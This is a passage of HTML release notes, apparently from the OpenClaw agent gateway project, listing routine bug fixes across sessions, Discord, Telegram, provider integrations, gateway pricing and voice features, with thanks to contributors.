<p>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</p>
</li>
<li>
<p>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</p>
</li>
<li>
<p>TUI/chat: skip full provider model normalization during context-window warmup while preserving provider-owned context metadata, avoiding cold-start stalls with large model registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a>.</p>
</li>
<li>
<p>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</p>
</li>
<li>
<p>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</p>
</li>
<li>
<p>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</p>
</li>
<li>
<p>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</p>
</li>
<li>
<p>Codex/app-server: tolerate a second connection close during startup recovery and include retry counts plus stringified errors in the restart warning, so concurrent lanes do not fail after one shared-client race.</p>
</li>
<li>
<p>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</p>
</li>
<li>
<p>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, so thinking/tool follow-up turns do not fail with DeepSeek's replay-shape error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a>.</p>
</li>
<li>
<p>Anthropic-compatible streams: recover text deltas that arrive before their matching content block, so Kimi Code and similar providers do not finish as empty <code>incomplete_result</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</p>
</li>
<li>
<p>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>MCP/OpenAI: normalize parameter-free tool schemas whose top-level object <code>properties</code> is missing, null, or invalid before sending tools to OpenAI, so MCP tools without params stay usable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>TTS: honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, so tagged voice replies are synthesized instead of being dropped as empty voice-only payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</p>
</li>
<li>
<p>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</p>
</li>
<li>
<p>Discord: allow explicitly configured ack reactions in tool-only guild channels while keeping automatic lifecycle/status reactions suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>.</p>
</li>
<li>
<p>Discord: enable session-backed A2A announce target lookup so <code>sessions_send</code> uses the target session's <code>deliveryContext.accountId</code> or <code>lastAccountId</code> instead of falling back to the default bot in multi-account setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Discord/setup: write resolved guild/channel allowlist selections to the selected guild and channel instead of falling back to the wildcard guild during setup. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>.</p>
</li>
<li>
<p>Discord: treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, so health-monitor restarts no longer reject the monitor lifecycle. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>.</p>
</li>
<li>
<p>Discord/native commands: return an explicit warning when slash command dispatch or direct plugin execution produces no visible reply instead of a success-style completion ack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</p>
</li>
<li>
<p>Discord: keep typing indicators alive during long tool runs and auto-compaction while keepalive ticks continue, so active sessions do not appear stalled before the final reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</p>
</li>
<li>
<p>Discord: preserve multipart Content-Type headers for attachment uploads across REST fetch paths, so generated images and other media no longer fail delivery with <code>CONTENT_TYPE_INVALID</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>.</p>
</li>
<li>
<p>Discord: preserve attachment and sticker filenames when saving inbound media, so agents can see human-readable file names instead of only UUID-based paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>.</p>
</li>
<li>
<p>Discord: preserve non-ASCII channel names in session display labels while keeping allowlist matching on the existing ASCII slug contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</p>
</li>
<li>
<p>Discord/PluralKit: canonicalize proxied webhook turns to the original Discord message id for inbound dedupe, while preserving the proxy message id for reply routing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord: only inject thread starter context on the first turn of the effective thread session, so follow-up thread replies do not repeat the starter block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</p>
</li>
<li>
<p>Discord: resolve thread <code>ownerId</code> and <code>parentId</code> from Discord API-style snake_case payload fields, so bot-owned autoThreads do not require unnecessary mentions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</p>
</li>
<li>
<p>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</p>
</li>
<li>
<p>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</p>
</li>
<li>
<p>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: report missing dial-in details during setup and explain that Twilio cannot join Meet URLs without a phone dial plan.</p>
</li>
<li>
<p>Google Meet/Twilio: start the phone leg before sending Meet PIN DTMF, delay intro speech until after the post-connect dial sequence, and log each stage so operators can tell Twilio-leg audio from Meet-room audio.</p>
</li>
<li>
<p>Voice Call: accept provider call IDs for gateway speak/continue requests and report ended-call state from history instead of returning a generic "Call not found" for stale calls.</p>
</li>
<li>
<p>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</p>
</li>
<li>
<p>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</p>
</li>
<li>
<p>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</p>
</li>
<li>
<p>Telegram/DMs: keep incidental <code>message_thread_id</code> reply-with-quote metadata on the flat DM session by default while preserving opt-in DM topic isolation for configured topics, <code>dm.threadReplies</code>, and <code>direct.&lt;chatId&gt;.threadReplies</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>.</p>
</li>
<li>
<p>Telegram/network: raise outbound text and typing Bot API request guards to 60 seconds, keep low grammY client timeouts from preempting those guards, let higher <code>timeoutSeconds</code> configs extend safe method guards, and retry timed-out typing indicators through the transport fallback without risking duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>.</p>
</li>
<li>
<p>Telegram/native commands: register and clear command menus in both default and group-chat scopes, so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</p>
</li>
<li>
<p>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</p>
</li>
<li>
<p>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</p>
</li>
<li>
